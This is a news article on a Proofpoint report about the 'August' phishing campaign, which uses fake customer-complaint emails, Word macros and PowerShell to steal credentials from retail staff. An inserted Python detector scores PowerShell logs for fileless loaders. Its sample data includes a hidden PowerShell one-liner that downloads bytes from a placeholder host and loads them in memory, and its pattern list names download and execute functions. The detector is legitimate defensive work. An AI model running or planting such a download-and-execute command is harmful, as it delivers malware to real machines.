A new malware-laden phishing campaign, dubbed August, has been detected targeting customer service and managerial staff at retailers, according to a new report from Proofpoint.
The clever ploy spreads through an email that arrives in the inboxes of targeted individuals with subject lines referring to supposed purchases made via the company’s website. Recipients are specifically selected as the representatives who would handle such customer issues. The message further dupes recipients by saying that more detailed information is contained in the attached document. Subject lines used in the campaign include “Help: Items vanish from the cart before checkout” and “Support: Products disappear from the cart during checkout.”
Should a recipient click on the link, the August malware is loaded via Word macros and PowerShell. It can steal credentials and siphon off sensitive documents from the infected computer.
The researchers said the campaign is the work of TA530, an individual or gang whom they previously cited for other highly personalized targeted campaigns. The macro, too, works much like a previous iteration in which sandbox-evasion techniques were used to load the Ursnif banking trojan while evading detection by security researchers. Of particular note in this instance, however, a PowerShell command is used to “‘filelessly’ load the payload from a byte array hosted on a remote site,” the researchers said.
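As an added illustration that is not part of the Proofpoint report or this article, the following Python scores PowerShell script-block log text for the pattern described above: a remote fetch of raw bytes combined with an in-memory load rather than a file written to disk. The indicator list, weights, threshold, host names and sample log lines are assumptions constructed for the example.

```python
"""Score PowerShell script-block text for the fileless byte-array loader
pattern: bytes pulled from a remote host and handed to an in-memory loader.
Indicators, weights, threshold and sample lines are constructed (assumptions)."""
import re

# (label, regex, weight): the two halves of the pattern score highest;
# a byte-array cast and a hidden/non-interactive window add supporting weight.
INDICATORS = [
    ("remote_fetch",  re.compile(r"\b(DownloadData|DownloadString|Invoke-WebRequest|iwr)\b", re.I), 2),
    ("inmemory_load", re.compile(r"Reflection\.Assembly\]?::Load\b|\bInvoke-Expression\b|\bIEX\b", re.I), 3),
    ("byte_array",    re.compile(r"\[byte\[\]\]", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-NonInteractive\b", re.I), 1),
]
THRESHOLD = 4  # fetch plus in-memory load crosses the line; either alone does not


def score_line(line):
    """Return (score, matched_labels) for one script-block text."""
    hits = [label for label, rx, _ in INDICATORS if rx.search(line)]
    score = sum(w for label, _, w in INDICATORS if label in hits)
    return score, hits


def flag_suspicious(lines, threshold=THRESHOLD):
    """Return the indices of lines whose score meets the threshold."""
    return [i for i, line in enumerate(lines) if score_line(line)[0] >= threshold]


# Constructed sample script blocks, as a log collector might record the text
# of a PowerShell script-block event; host names are placeholders.
SAMPLE_BLOCKS = [
    # benign administrative task
    "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB",
    # benign download that writes a file to disk (fetch only, below threshold)
    "Invoke-WebRequest https://updates.example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip",
    # fileless pattern: hidden window, remote bytes, in-memory load
    "powershell -w hidden -nop $b=(New-Object Net.WebClient).DownloadData('http://c2.example.invalid/a');[Reflection.Assembly]::Load($b)",
]

if __name__ == "__main__":
    for i in flag_suspicious(SAMPLE_BLOCKS):
        score, hits = score_line(SAMPLE_BLOCKS[i])
        print(f"block {i}: score={score} hits={hits}")
```

Only the third block is flagged; the disk-writing download scores below the threshold, which is the point of weighting the fetch and the in-memory load separately.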
The Proofpoint researchers conclude that while this new campaign is currently targeting retail sites, its credential-stealing capabilities could easily be adapted for wider distribution.
“As email lures become increasingly sophisticated and personalized, organizations need to rely more heavily on email gateways capable of detecting macros with sandbox evasion built in as well as user education that addresses emails that do not initially look suspicious,” the researchers said.